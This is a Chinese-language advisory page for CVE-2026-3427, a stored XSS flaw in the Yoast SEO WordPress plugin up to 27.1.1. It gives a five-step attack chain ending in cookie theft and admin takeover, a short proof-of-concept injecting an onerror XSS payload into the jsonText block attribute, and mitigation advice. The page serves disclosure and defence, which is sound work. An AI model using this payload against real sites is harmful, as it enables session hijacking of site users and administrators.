CVE-2026-3427 CVSS 6.4 中危

CVE-2026-3427: Yoast SEO插件存储型XSS漏洞

披露日期: 2026-03-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3427

漏洞类型

存储型跨站脚本

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Yoast SEO WordPress Plugin

漏洞概述

Yoast SEO WordPress插件在27.1.1及之前版本中存在存储型跨站脚本漏洞。由于对`jsonText`块属性的输入清理和输出转义不足，经过身份认证的攻击者（拥有贡献者及以上权限）可以在页面中注入任意Web脚本。当用户访问被注入的页面时，恶意脚本将在浏览器中执行，可能导致会话劫持或数据窃取。

技术细节

该漏洞的技术根源在于Yoast SEO插件处理Gutenberg块编辑器数据时的输入验证缺失。具体而言，插件在处理用于生成Schema.org结构的`jsonText`块属性时，未对用户提供的数据执行严格的上下文感知转义。具备贡献者权限的攻击者可以编辑文章，在特定的Yoast SEO块中构造包含恶意JavaScript的`jsonText`值。这些数据被保存到WordPress数据库后，当管理员或访客浏览该页面时，插件会在前端渲染结构化数据，导致恶意脚本被直接注入到页面HTML中执行。这种存储型XSS允许攻击者窃取Cookie、执行管理员操作或重定向用户。

攻击链分析

STEP 1

侦察

攻击者确认目标网站使用了存在漏洞的Yoast SEO插件（版本 <= 27.1.1）。

STEP 2

获取权限

攻击者注册为一个低权限用户（如Contributor/投稿者）或破解此类账号。

STEP 3

注入载荷

攻击者登录后台，编辑文章，在Yoast SEO块的`jsonText`属性字段中插入XSS Payload并保存。

STEP 4

触发漏洞

管理员或普通用户访问包含该恶意块的文章页面，浏览器执行恶意脚本。

STEP 5

利用后果

攻击者通过执行的脚本窃取Session Cookie，进而接管管理员账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-3427
Description: Inject payload into the 'jsonText' attribute of a Yoast SEO block.
-->

<script>
// Step 1: Create a malicious payload
const payload = '<img src=x onerror=alert(document.cookie)>';

// Step 2: Simulate the block structure that would be sent to the WordPress REST API
// In a real attack, this is done via the Block Editor or direct API call
const maliciousBlock = {
    "blockName": "yoast/how-to-block",
    "attrs": {
        "jsonText": payload // Injecting into the vulnerable attribute
    },
    "innerHTML": "",
    "innerBlocks": [],
    "innerContent": []
};

console.log("Malicious Block JSON to be posted:", JSON.stringify(maliciousBlock));
// When this block is rendered on the frontend, the XSS triggers.
</script>

影响范围

Yoast SEO <= 27.1.1

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Yoast SEO插件中的结构化数据生成功能，或者严格限制文章发布流程，确保所有由Contributor提交的内容都必须经过管理员的手动审核才能发布，从而阻断恶意脚本的传播。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表